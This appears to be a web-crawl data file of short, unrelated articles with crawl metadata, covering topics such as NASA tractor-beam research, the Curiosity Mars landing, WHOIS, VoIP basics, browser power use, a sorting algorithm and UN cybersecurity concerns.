Yes, you read that right – NASA is actually trying to figure out how to make a working tractor beam. My fellow sci-fi fans may need to use the facilities right about now. Don’t worry, I’ll wait.
Long has the tractor beam – the ability to move objects using only laser beams – been a staple of science fiction. Both the “Star Trek” and “Star Wars” universes have them, and it has been featured in literature as early as the late 1920s. Real-life scientists have been theorizing about its potential development since the 1960s. But only recently has any headway been made into bringing them closer to reality.
Build a real Star Trek tricorder and you may live long and prosper
Now NASA has set aside money for a team to study various methods by which tractor beams might be developed for practical use. Likely one of the first uses a working prototype would be put to collect particle and molecular samples from things such as comet tails more efficiently than current methods.
One process uses two overlapping pulsating beams that use changes in air temperature so particles would be pulled up between them with a sort of light-based peristalsis. Another uses solenoid beams whose waves spiral around an axis and can suck up particles like a straw.
A third method, one that has never been developed beyond the theory stage, involves a beam of light whose cross-section looks like ripples in a pond, and which can induce magnetic fields in the path of an object.
Once put into use with current technology, these methods will only be effective on matter at the molecular level. So, unfortunately, you won’t be able to use lasers to move your sleeper sofa into the house any time soon. For that you’ll still have to rely on the current technology — a pick-up truck, three friends who owe you a favor and a couple six packs of beer.
Greg Crowe is a former GCN staff writer who covered mobile technology. | <urn:uuid:5b7f699b-681e-4dad-aeb6-7fbc9333515b> | CC-MAIN-2017-04 | https://gcn.com/articles/2011/11/03/nasa-tractor-beam-research.aspx?admgarea=TC_EMERGINGTECH | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00515-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960541 | 475 | 3.390625 | 3 |
Next time you are asked to deliver what seems like the impossible, give a thought to the technology and engineering team that landed the Mars Curiosity Rover.
In August 2012, the Curiosity landed on Mars, having only 7 minutes to go from the top of the planet’s atmosphere to ground surface, at a speed of 13,000 miles an hour to zero. If the timing, speed, aerodynamics, density or anything had of deviated from the plan, it would have been game over and all efforts would had gone to blitz.
Speaking at the recent YOW! conference in Sydney, Anita Sengupta, engineer at NASA’s Jet Propulsion Laboratory (JPL), spoke about one of the most challenging technology and engineering projects to have worked on.
When it comes to projects as ambitious as landing on Mars, there’s little room for error. It takes an immense amount of careful calculating, planning, designing, testing and deploying, only to then get one chance to either make it or break it. A ‘quickly release to market and see how it goes’ strategy does not translate to these types of NASA missions that cost billions of dollars.
“The environment between Earth and Mars is so different – different atmospheric density, different atmosphere composition, and different speed relative to the speed of sound,” Sengupta said of the challenges in designing equipment that will work with another planet’s physics.
“The problem with Mars is that the atmosphere is very thin; you only have 1 per cent of what it is on the surface of Earth. So landing on Mars is very, very difficult because of this.”
The other challenge was that NASA scientists wanted the Curiosity to land in a tight location in the Gale Crater. It’s this location that is believed to be rich in information on Mars’ history as being an ancient riverbed.
Fun fact: The Gale Crater is named after an Australian (Sydney based) astronomer called Walter Frederick Gale, who closely observed Mars back in the late 19th century.
“You can think about it as a bullseye on Mars,” Sengupta said of the tight space the Curiosity vehicle had to land in, while plummeting towards it at thousands of miles per hour.
“We are going from a distance of 300 million kilometres away and we are landing in an area of 20 km by 7 km. That's very, very difficult to do from a precision perspective.
“In Gale Crater, we wanted to land in a landing ellipse to ensure we wouldn't collide with the mountain in the middle or collide with the crater walls.”
The on-board computer had to handle all that to control the equipment and properly land the vehicle, which took an incredible amount of software, Sengupta said.
“One of the critical technologies is the ability to fly the vehicle. So the vehicle is a lifting body, and by rotating the location of the lift vector, you can actually [generate a] lift and change your course direction as you go down. All of that is flown autonomously by the on-board flight software,” she said.
Computer simulations were also key to making the landing project successful. As Earth is very different to Mars, it would be impossible to fully simulate the right environment on Earth to test if the vehicle and the attached parachute to help it land when closer to the ground would work.
Monte Carlo simulations ran on supercomputers, which take into account the density, speed, aerodynamics and other parameters. The simulations were also validated against subscale experiments in a supersonic wind tunnel to see if the findings matched.
“We ran the simulations to be able to understand what's going on with the interaction with the supersonic flow field and the interaction with the parachute.
“It was confirmed that the physics that we were seeing in the simulation was actually happening in the supersonic wind tunnel of about 3 per cent of the scale of the full size.”
High speed cameras (about 2000 frames per second) and post digital image processing technology were used to capture the events happening at extremely fast speeds in the wind tunnel, which helped with designing the parachute to ensure it could withstand Mars atmosphere.
Although the team was almost spot on in landing in the exact ideal spot in the Gale Crater, the vehicle is not yet equipped to automatically re-adjust the speed or whatever it needs to in real time if there's a slight miscalculation or something isn't fully taken into account when doing the simulations.
However, Sengupta said margins are used when doing calculations on things that are not well-known in Mars such as aerodynamic heating, and these margins are also factored into the simulations.
Join the CIO Australia group on LinkedIn. The group is open to CIOs, IT Directors, COOs, CTOs and senior IT managers. | <urn:uuid:99fd63b3-1699-4d61-a589-f5482e650598> | CC-MAIN-2017-04 | http://www.cio.com.au/article/590920/how-landing-mars-makes-your-tech-challenges-look-like-piece-cake/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00425-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967302 | 1,019 | 3.53125 | 4 |
As Mr. William already guided you on to right way, just few lights on the functioning.
INTEGER-OF-DATE function returns value as an integer that is the number of days that the input date succeeds December 31, 1600 in the Gregorian calendar. The function result is a seven-digit integer with a range from 1 to 3,067,671.
So basically INTEGER-OF-DATE(INPUTDATE) would return an integer representing number of days between 12/31/1600 and your input date.
So now you should not be having problem understanding how this works:-
COMPUTE NUMBER-DAYS-1 = FUNCTION INTEGER-OF-DATE(YYYYMMDD). //*input date 1
COMPUTE NUMBER-DAYS-2 = FUNCTION INTEGER-OF-DATE(YYYYMMDD). //*input date 2
COMPUTE DIFFERENCE-DAY= NUMBER-DAYS-1 - NUMBER-DAYS-2. | <urn:uuid:f7010d40-30d4-4899-9d57-c0970ea92b84> | CC-MAIN-2017-04 | http://ibmmainframes.com/about15791.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00241-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.776728 | 222 | 3.15625 | 3 |
No, that title is not a typo. The WHOIS service and the underlying protocol are a relic of another Internet age and need to be replaced.
At the recent ICANN 43 conference in Costa Rica, WHOIS was on just about every meeting agenda because of two reasons. First, the Security and Stability Advisory Committee put out SAC 051 which called for a replacement WHOIS protocol and at ICANN 43, there was a panel discussion on such a replacement. The second reason was the draft report from the WHOIS Policy Review Team.
This is hardly the first time there has been hand-wringing about WHOIS, especially at ICANN. So what's all the noise about now?
What is WHOIS?
To understand why we have WHOIS at all, a little history is needed. In the ancient pre-history of the Internet was a network called the ARPANET. It was an experimental network and as you might imagine, an important part of running an experimental network is being able to get in touch with the people participating in the experiment when something goes wrong.
Initially, the contact information was maintained at the Network Information Center, and over time, it migrated online. It appeared in the NICNAME/WHOIS service and the protocol was published in RFC 812 in 1982. To give an idea of how long ago that is in Internet terms, the ARPANET didn't officially transition to TCP/IP and DNS didn't exist until 1983.
Because WHOIS was really intended to be a service devoted to finding people's contact information when one needed to reach them, it was also a service designed to be consumed by humans. This made for a very simple protocol with free-form text in replies. In the 1990s — when our contemporary domain name management system came to be with ICANN, registrars, registries, and billions of people online — WHOIS came along for the ride.
People started using the term "WHOIS" to mean the protocol, but also the service (which is sometimes delivered as, for example, a web page), and even the data that you can get out of the service.
The registration data for domain names can be useful. Different parts of the data are useful to different people, but WHOIS cannot make those partial distinctions. Also, WHOIS is anonymous, so not only does everyone get the same data, but the WHOIS service doesn't even know who asked for the data. Because of that, many people who value their privacy simply lie when they enter registration data. That way, their phone numbers or street addresses can't be looked up by just anyone on the Internet.
A different environment, a different tool
The Internet has evolved considerably since WHOIS was specified and we have different problems than we did in those days. On a network (like the ARPANET) where it was at least theoretically possible to get a list of every person on it, things like spam were not a problem. Today, we need to be able to tell whether several domains are controlled by the same person in order to combat mail abuse.
And while it might be perfectly appropriate for law enforcement to be able to get your street address under the right circumstance, it isn’t clear that your address needs to be published for more than two billion people to see just so that you can have a domain name. Solving these sorts of problems will be impossible if the Internet community doesn’t settle on a new data access protocol without the limitations of WHOIS.
Work is just getting started and at this week’s IETF meeting, we hope to take another step on this path. We hope others in the ICANN and IETF communities will also work on making this much-needed improvement to the registration landscape.
Dyn was pleased to express its support for the SAC 051 recommendations and a plan to implement them. Dyn Labs is working on prototype versions of WHOIS protocol replacements so that once a new protocol standard is ready to go, we can move quickly to replace the old, less useful service with a new one.
By Andrew Sullivan, Director of Labs at Dyn
|Data Center||Policy & Regulation|
|DNS Security||Regional Registries|
|Domain Names||Registry Services|
|Intellectual Property||Top-Level Domains|
|Internet of Things||Web|
|Internet Protocol||White Space|
Afilias - Mobile & Web Services | <urn:uuid:a66bb5ca-8a5a-47b2-8db7-f2b0ae5adef6> | CC-MAIN-2017-04 | http://www.circleid.com/posts/wither_whois_a_new_look_at_an_old_system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00241-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940358 | 912 | 2.78125 | 3 |
Measuring Our World with Wireless Sensor Networks
I recently interviewed Seapahn Megerian, a professor in the Electrical and Computer Engineering Department at the University of Wisconsin, about wireless sensor networks for an upcoming feature for CertMag’s Systems & Networks community. He talked about some very intriguing possibilities for this new technology, including space exploration, as well as some potential drawbacks.
For those of you who don’t know what wireless sensor networks are and want a relatively simple explanation, think back to the movie “Twister.” Remember those metallic balls that Helen Hunt and Bill Paxton’s characters sent up into the tornado to measure dimensions like size and wind speed? Imagine those balls being shrunk to the size of marbles or even smaller, and you have a pretty good sense of how a wireless sensor network might look.
In fact, their diminutive size is one of their most appealing qualities, Megerian said. “Miniaturization is one of the stronger motivators for the advent of wireless sensor networks. Smaller, faster and lower power, which essentially mean cheaper, can have tremendous impacts on virtually any branch of computer engineering. Nanotechnology not only opens new door in terms of new sensor technologies, but also in terms of tiny actuators that when combined with sensors and computers can go a step beyond in just observing and learning. With actuators, we can actually do stuff!”
However, we have to be careful when using these technologies, because their presence may wind up changing the environment they’re intended to measure. “We must also be conscious of the environmental effects that placing such sensor nodes can have, especially in large quantities,” he said. “Given the current battery technologies, it is clear that we do not want them sprinkled everywhere and left as garbage when they exhaust their useful lifetimes. When you are sending hundreds of satellites into orbit, and leave them there as space dust, it doesn’t really matter. But throwing 100,000 sensor nodes from an airplane to monitor a habitat here on Earth can have very significant environmental repercussions down the line.”
“We must be careful to not become too entangled by complex technologies around us. Having a typical user in mind, I think it is crucial to make sure the wireless sensor networks we design integrate into the surroundings as seamlessly as possible. In other words, if I have a 100 sensor nodes in my house, I don’t want 100 blinking clocks that are always stuck at 12:00 a.m. (a pun to the old VCR days)!” | <urn:uuid:8c3ac72a-7ab8-4fa8-adbc-3c931463535c> | CC-MAIN-2017-04 | http://certmag.com/measuring-our-world-with-wireless-sensor-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95346 | 530 | 2.625 | 3 |
A cookie is a data file that websites store on your computer, so that they can recognize your computer the next time you visit the website.
Cookies are sent back and forth between your browser and a Web server and contains information such as:
Contents of shopping basket
If a user is logged in
Usage of the website
A cookie file is passive and cannot spread computer viruses or other malicious programs. Often they help analyze how the website is used, to improve the user experience. In several cases, cookies may be necessary to provide a service.
Cookies are usually automatically deleted from the browser when it is closed (so-called session cookies). Cookies can also be set with an expiration time, so that data exists for a shorter or longer period (persistent cookies). Persistent cookies are usually stored on the hard disk.
Furthermore, a distinction is usually made between first party cookies and third party cookies. First Party Cookies are set by the page the user visits. Third Party Cookies are set by a third party, which has elements embedded on the page the user visits.
Cookies from Google Analytics
At heimdalsecurity.com we use Google Analytics to analyze how users use the site. The information collected by the cookie about your use (traffic data, including your IP address), is transmitted to and stored on Google servers in the U.S. Google uses this information to evaluate your use of the website, compiling reports on website activity and providing other services relating to website activity and internet usage. Google may also transfer this information to third parties if required by law, or if third parties process the information on Google's behalf.
Google Analytics allows two types of cookies: a persistent cookie that indicates whether the user is recurrent, where the user comes from, which search engine where used, keywords, etc. Session Cookies, which are used to show when and how long a user is on the site. Session cookies expire after each session, ie when you close your tab or browser. Google does not match your IP address with other data Google holds.
If you wish not to receive cookies from heimdalsecurity.com, you can, in most new browsers, select advanced cookie settings under Internet options and add this domain to the list of websites you want to block cookies from.
If you do not want your visit to be recorded by Google Analytics, you can take advantage of Google’s Opt-Out Browser Add-on. Be aware that your visits to other sites that use Google Analytics, nor will be registered, if you install this browser plugin.
See also these guides for the most common browsers:
Instructions for deleting cookies in Microsoft Internet Explorer
Guide to delete cookies in Mozilla Firefox browser
Guide to delete cookies on the Google Chrome browser
Guide to delete flash cookies (for all browsers)
Why do Heimdsecurity.com inform about this?
Cookies are used to collect data on Internet users' behavior. Although this is usually done to give the user a better experience or are technically necessary to use a solution, the user should be informed that it happens and be able to prevent this from happening in future.
Most EU sites are soon obliged to inform about cookies set on the users' equipment. Information must be in accordance with "Notice of requirements for information and consent for storing and accessing information in end-user terminal equipment", which is part of an EU directive on the protection of privacy in electronic communications. | <urn:uuid:5fb2bfd3-8197-4086-a005-f6d83a65b2a5> | CC-MAIN-2017-04 | https://heimdalsecurity.com/en/cookies | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00543-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916499 | 698 | 2.796875 | 3 |
Fiber Optical Attenuator is used an electronic device often reduce the level of performance of an optical signal in a fiber optic communication system. In the optical fiber is also known as transmission loss attenuation. Attenuation is an important element in order to limit the transmission of a digital signal, at large distances. An optical attenuator reduces this optical signal as it propagates along a free space or an optical fiber.
There are three basic types of fiber optical attenuator, fixed attenuators reduce light signals through certain amount with negligible or no reflection. Because signal reflection is not an issue, fixed attenuators for precise data transmission becomes known. Above a certain temperature, size and height Fixed attenuators are often used in order to improve inter-stage matching circuit in an electronic circuit. Thorlab fixed attenuators are dB from 5 dB to 25. Mini-Circuits’ fixed attenuators are packaged in robust plug-in and plug models. They are available in both 50 – and 76-ohm models spanning from 1to 40 dB DC to 1500 MHz.
Optical variable attenuator is a double window (1310/1550nm) of passive components. The variable optical attenuator could continually and variably attenuate the light intensity in the optical fiber transmission. Variable fiber optic attenuator could help simulate distance or actual attenuation in the fiber optic testing work by inserting a calibrated attenuation into the link.
In the variable optical attenuator, resistors, which replaced with electronic devices, such as the metal-semiconductor field-effect transistor and PIN diodes. Variable Optical Attenuator light signal or beam in a controlled manner, thereby producing an output optical beam with different attenuated intensity. The attenuator is the power ratio between the light beam from the device and the light beam in the device for a variable rate. Variable optical attenuators are typically used in fiber optic communication systems to regulate optical power to damage in optical receivers, which can be prevented by irregular or fluctuating power levels. The price of commercial veriable optical attenuator depends on the production technology used ever.
FiberStore is a online shop supply Fiber Optic Attenuator FC, SC/APC, ST, PC, LC, UPC, MU, FC/APC, SC, LC/APC, fixed value plug type fiber optic attenuators with different attenuation level, from 1dB to 30dB. You can buy fiber optic connection products on our store with your confidence. All of fiber optics supplies with high quality but low price. | <urn:uuid:35ea61dc-1e44-4d63-8d6f-4ae140cbc970> | CC-MAIN-2017-04 | http://www.fs.com/blog/brief-introduction-of-fiber-optical-auttenuator.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00177-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.881146 | 533 | 3.15625 | 3 |
Summer's approaching, and with energy bills are going up. And if you want to cut your PC's power bill, you should use--Microsoft's Internet Explorer?
That's the result of a Microsoft-sponsored studyA (PDF) by Fraunhofer, which found that Internet Explorer consumed less power than both Chrome and Mozilla's Firefox when accessing the Web's top ten sites.
[ BROWSER BATTLE: Chrome vs. Firefox vs. IE vs. Opera ]
Watt's the difference?
Unfortunately for Microsoft's case, the differences areA minuscule--on the order of about a watt when laptops were measured surfing Web sites, or just 2 percent or so between the other two.
When using Flash, however, the differences are more pronounced: Microsoft's Internet Explorer uses 18.6 percent less power than Chrome, Microsoft said.
That's not to say that Microsoft let that small fact stop it from extrapolating the massive energy savings if only the nation's computing population could be converted over to its browser.A Redmond said the energy saved could powerA 10,000 householdsA in the United States for a year, Microsoft said, or provide the carbonA reductionA equivalent of growingA 2.2 million trees for 10 years.
Fraunhofer didn't explain exactly why the browsers consume more power, although it's presumably tied to the number of processor CPU cycles consumed over time. The implication is that IE is more power-efficient than the other browsers, even if it may not be the absolute fastest.
HTML5 power processing
Nevertheless, the Fraunhofer study found another interesting angle: the processing power needed to render a site coded in HTML5 could far outpace that of a normal Web site.
"Testing of two HTML5 websites (one benchmark, one video) and one Flash video found that bothA appear to increase power draw significantly more than the top ten websites tested," the study said. "Most notably, theA HTML5 benchmark test condition more than doubled the notebook power draw for all computers andA browsers tested, while desktop power draw increased by approximately 50 percent."
Unfortunately, Fraunhofer didn't perform enough tests to conclusively prove that an HTML5 site would consume more power, perhaps because a CPU-intensive benchmark was included. The firm said that more testing was needed.
This story, "Microsoft claims IE consumes less power than other browsers" was originally published by PCWorld. | <urn:uuid:78a400ac-1211-48b7-9d81-611d064d616f> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2167022/applications/microsoft-claims-ie-consumes-less-power-than-other-browsers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00443-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933139 | 500 | 2.84375 | 3 |
Mamadou Barab Samb is a Global Knowledge instructor who teaches and blogs from Global Knowledge Egypt.
According to the OSI layer concept, routing, or best path selection, takes place on Layer 3 and is based on the logical address. In this post, we want to discuss some of the points in that statement.
What is Layer 3?
To make the design and troubleshooting easier and group all the vendors into a common platform to achieve compatibility and interoperability, the concept of network models was created. OSI model was one of those models, and it’s composed of seven layers, each of them playing a strict role in the data delivery process.
The Layer 3, or Network Layer, is responsible for finding the right path for the data packet to reach its destination based on Logical Addresses (means addresses not really present on the network node).
But why we do need those Logical Addresses?
Despite of the existence of physical addresses (like MAC addresses) on each of the network nodes, we still need to configure Logical Addresses even if we know that the delivery of the message is still based on that physical address. Logically you have to wonder why I do need to set an IP address for my host if frames are delivered to it based on its MAC address? Simply, the reason why you configure the IP addresses is efficient routing by constructing a database of entries that represent the node addresses in a summarized way (one network ID representative multiple nodes).
Yes, routing starts on your own PC with an Anding process that takes place to determine whether the communicating device is local or remote and defines the MAC address it will use to deliver the frame.
You can view your PC routing table by issuing the command ROUTE PRINT on your command prompt.
Why do we need routing?
Simply, because each device is only aware of the connecting networks, so it needs to discover the remote ones. And routers are those dedicated devices that play the role of handling packets sent by network nodes to fellow nodes. To succeed in this handling process, the routers have to be aware of all the distant addresses, and this is done by constructing a forwarding database called a Routing Table. That table contains the Network IDs, the path where the router can reach them (Exit Interface, Next Hop), and the cost or distance of those routes ( Metrics).
How do we achieve routing?
The achievement of the routing process is guaranteed by the existence of all the possible networks in the routing database. You may wonder how the router can learn about all these networks! In STATIC ROUTING, it’s the administrator’s job to let the routers know about remote networks by entering them manually into the routing database. Obviously this can only be done when we only have limited entries. Otherwise, in the case of a huge network, DYNAMIC ROUTING PROTOCOLS are used.
Each of those protocols calculates the network path distance (Metric) in its own way. Some use the number of routers to cross (like RIP), some use the speed of the links to cross (like OSPF), and some use the speed and delay of the links to cross (like EIGRP).
How do we determine the best path?
In the process of constructing the routing database, the router may face the issue of selection when multiple paths are proposed to it by several fellow routers. In that case, the router asks two important questions: What’s the most trusted source? And what’s the lowest distance? Obviously, and based on what we discussed earlier on how routing protocols calculate path distance, the router uses this trust preference order:
- ITSELF (connected routes)
- The Administrator (Static routes)
- RIP routes (there are more than three dynamic routing protocols and so the preference list is much longer)
This trust preference order is called Administrative Distance.
What if the router has several possible paths to the same destination from the same routing source? Here the second question, what’s the lowest distance route, acts as a tie breaker, and a distance preference order is used based on a Metric value.
Now the final case is what if the packet received by the router matches several entries in the same database? Here a third question has to be asked: What’s the most specific entry? This is determined by the using the entry with longest prefix or matching bits.
But what if the packet matches multiple entries with the same matching bits? The router load balances the packets to the possible forwarders. Meaning that if the routers receives, let’s say, twenty packets and has four different matching paths, it will divide the load (the packets) to make the routing process faster and more efficient which results in a better network performance. | <urn:uuid:19851caa-408a-45aa-b23f-7677e8476b96> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2011/06/23/routing-decisions-best-path-selection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00351-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93212 | 987 | 3.75 | 4 |
The amazing paper maps created by National Geographic over the years will be included with Google Maps under a new public data program.
Google Maps is now gaining some spectacular map imagery from the National Geographic Society, which is contributing some 500 of its maps to Google Map's new public data program.
The addition of the National Geographic maps
was unveiled by Frank Biasi, director of digital development for National Geographic Maps
, in a Dec. 6 post on the Google Lat Long Blog
Under the newly launched Google Maps Engine public data program
, organizations can now distribute their map content to consumers using Google's cloud infrastructure, according to Google. And that's where National Geographic's contribution comes in, bringing digital images of many of the long-popular printed maps that are often tucked inside the latest issues of the magazine.
"Founded in 1888, National Geographic Society aims to inspire people to care about the planet," wrote Biasi. "As one of the world's largest nonprofit scientific and educational organizations, we've funded more than 10,000 research, conservation and exploration projects. Maps and geography are integral to everything we do; it's even part of our name. Over our long history, we've created and published more than 800 reference, historic and travel maps."
And since many of those maps over time have been collected and saved by recipients, they stay alive for many people. But the rest of the world can't access them when they are stored in attics and basements, so National Geographic decided to join Google Maps' new program, wrote Biasi. "The public data program gives us the opportunity to release our amazing map collection to the wider world."
To do that, National Geographic will also use Google Maps Engine "to overlay our maps with interactive editorial content, so the maps can 'tell stories' and raise awareness about environmental issues and historic events," he wrote. "Anyone will be able to access our free public maps, but we also plan to sell or license high-resolution and print versions to raise funds for our nonprofit mission."
Biasi wrote that by partnering with Google Maps, his group hopes that it will "help our maps get discovered by more people, including National Geographic fans, students and educators and travelers. We expect travel and home decor businesses, publishers and brand marketers will also want to buy or license them."
National Geographic will use many of Google Maps' broad features to digitize and share the maps, including data, layers, combining layers into maps, publishing individual layers as maps and integrating multiple maps, he wrote. "We use both the raster and vector capabilities to put descriptors, links, pop-ups and thumbnails on top of maps. For example, we could use Maps Engine to add articles, photography and information from National Geographic expeditions to our ocean maps. These interactive maps, which we can display in 2D or 3D using Maps Engine, will allow people to follow along with expeditions as they unfold or retrace past expeditions."
By putting the selected maps into Google Maps, the group will now be able to "turn our maps into interactive full-screen images that can be panned and zoomed and overlaid with tons of great data," wrote Biasi. "We are proud of our century-long cartographic tradition. The Maps Engine public data program will help get our maps out into the world where more people can enjoy and learn from them."
The Google Maps Engine public data
program provides advanced tools
that allow map producers to publish their public mapping content to the world, according to Google. "By enabling you to unlock your mapping data, together we can organize the world's geospatial information and make it accessible and useful."
Organizations that produce maps, such as public data providers and governments who have content in the public good, can apply to participate in the program
, according to Google.
In October, Google released Google Maps Engine Pro
to make it easier for businesses to use online maps to attract customers and new revenue. The new professional mapping tool lets businesses visualize their huge amounts of critical data on maps so they can take advantage of the new resources the data provides, according to Google. Google Maps Engine Pro was built as an application on top of the Google Maps Engine platform
, which provides businesses with cloud-based technology to help them organize large datasets and create more complex maps.
In July, Google Maps unveiled a new maps layer for developers
so that they can better integrate their data with images in Google Maps. The innovative DynamicMapsEngineLayer gives developers the abilities to perform client-side rendering of vector data, allowing developers to dynamically restyle the vector layer in response to user interactions like hover and click, according to the company. The new maps layer makes it easier for developers to visualize and interact with data hosted in Google Maps Engine.
In June, Google for the first time released its Google Maps Engine API
to developers so they can build consumer and business applications that incorporate the features and flexibility of Google Maps. With the Maps API, developers can now use Google's cloud infrastructure to add their data on top of a Google Map and share that custom mash-up with consumers, employees or other users. The API provides direct access to Maps Engine for reading and editing spatial data hosted in the cloud, according to Google. | <urn:uuid:af5f9275-0a46-4762-98d9-9eb0a3238925> | CC-MAIN-2017-04 | http://www.eweek.com/cloud/national-geographic-sharing-its-maps-with-google-maps.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00075-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922409 | 1,079 | 2.59375 | 3 |
Today, we’d like to get back to a few basics about the relationship between the public-switched telephone network and voice over IP.
The PSTN includes a signaling system, a series of central offices and a distribution network. The PSTN employs a packet-based network called Signaling System 7 (SS7) or Common Channel Signaling System 7 (CCSS7) to determine the best call route, connect the callers and control calls. Private voice network systems like PBX and key systems work with the PSTN to create a hybrid public/private network.
Using IP to signal and transport voice brings several fundamental shifts to traditional voice communications. In the legacy PSTN environment, unused bandwidth cannot be shared; using packetized transmission (like an IP packet) for voice shares unused bandwidth and allows for greater efficiency, thereby reducing cost. IP is the packet protocol of choice for voice because the overall volume of users’ WAN traffic is dominated by IP.
In the PSTN, voice network features are delivered to a user on a static pair of copper wires to a static local central office switch or PBX. VoIP allows the traditionally switched services to be delivered to a user anywhere the user is connected.
The three most common ways to deploy private VoIP include the use of VoIP gateways, VoIP-enabled routers or an IP-PBX.
VoIP gateways represent one of the easiest ways to deploy VoIP. A gateway transforms SS7 signaling and traditional voice transmissions into IP-based signaling and transmission techniques. By installing a gateway, a business can connect to an IP or other data network and a TDM network simultaneously.
VoIP-enabling routers means adding a gateway function to a router. Routers can be upgraded to include the gateway and voice-specific features.
IP-PBX and IP-enabled PBX deployments are similar in that they start with PBX features and include a gateway function.
Steve and Larry have co-authored a technology backgrounder about basic telephony and VoIP. If you’d like to read more about the basics or see a presentation featuring Steve and Larry, please see the links below. | <urn:uuid:20173c51-fd95-4e42-90eb-488a78dbf9e6> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2324219/lan-wan/how-voip-relates-to-the-pstn.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00075-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910645 | 446 | 2.5625 | 3 |
After 35 years of travel, NASA’s Voyager 1 space probe left our Solar System on Aug. 25, 2012, NASA recently announced. This makes Voyager 1 the first known man-made object to travel into interstellar space. The probe is now 12 billion miles from the sun and capturing sounds, and the first sound clip has been released by NASA. As of this year, the probe is traveling at a relative velocity to the sun of 11 miles per second. By 2025, the probe will not have enough energy to power any of its instruments. | <urn:uuid:feea8516-9081-413c-9ed0-9c1ae8203706> | CC-MAIN-2017-04 | http://www.govtech.com/question-of-the-day/Question-of-the-Day-for-091613.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00561-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937014 | 110 | 3.328125 | 3 |
The need for environmental awareness and stewardship by individual government employees is increasing. Several states are enacting legislation calling for reduced carbon emissions and encouraging the use of energy from renewable sources. With this increased awareness comes the increased desire to do something to positively influence the impact of human activity on the planet.
According to widely accepted estimates, IT operations account for two percent of global carbon dioxide emissions-the same as the airline industry. Not to mention the heaps of cell phones and computer equipment that the United States throws away every year. And the information technology industry is expected to grow by 150 percent in the next few years.
So while the use of technology grows, government employees can still do something about the environmental impact they have every day. A major component of encouraging that is training. To facilitate that during this economic downturn, online training provider SafetyFirst is providing free training on a variety of topics relating to environmental sustainability. The company is offering the training free to groups of 100 employees or less. In exchange, the company is asking that participants help beta test its SafetyFirst Direct training delivery service.
Course topics include environmental awareness, carbon footprint reduction, used oil disposal and universal waste management. | <urn:uuid:29919de9-3c19-4b6d-bac4-1928b5409697> | CC-MAIN-2017-04 | http://www.govtech.com/education/Company-Offers-Free-Environmental.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00379-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952831 | 238 | 2.609375 | 3 |
Definition: A sort algorithm that works well if many items are in order. First, begin a sublist by moving the first item from the original list to the sublist. For each subsequent item in the original list, if it is greater than the last item of the sublist, remove it from the original list and append it to the sublist. Merge the sublist into a final, sorted list. Repeatedly extract and merge sublists until all items are sorted. Handle two or fewer items as special cases.
Generalization (I am a kind of ...)
Aggregate parent (I am a part of or used in ...)
See also selection sort, merge sort, UnShuffle sort.
Note: This works especially well with linked lists.
Explained in a message about J sort posted in 1997.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 24 November 2008.
HTML page formatted Mon Feb 2 13:10:40 2015.
Cite this as:
Paul E. Black, "strand sort", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 24 November 2008. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/strandSort.html | <urn:uuid:2335e361-8939-45cc-a828-6f937d11588f> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/strandSort.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00195-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.848067 | 285 | 3.78125 | 4 |
The United Nations helps developing countries build infrastructure and protect human rights. Cybersecurity has become a new concern in carrying out those missions.
“One of the fundamental problems that’s come up is the threat of cybersecurity against their critical infrastructure,” says Paul Raines, CISO of the UN Development Programme. “If one country launched a cyber attack to politically intimidate another, it could do significant damage by tampering with the power grid, education, utilities or police facilities.” It’s also a question of human rights to access information and presumption of privacy, he adds. “If they’re spying on citizens or intercepting information – that’s fundamentally an issue of human rights.”
[ MORE FROM CSO50 2016: Century Health’s security rearchitecture staves off phishing scam | CSO50 2016 winners announced ]
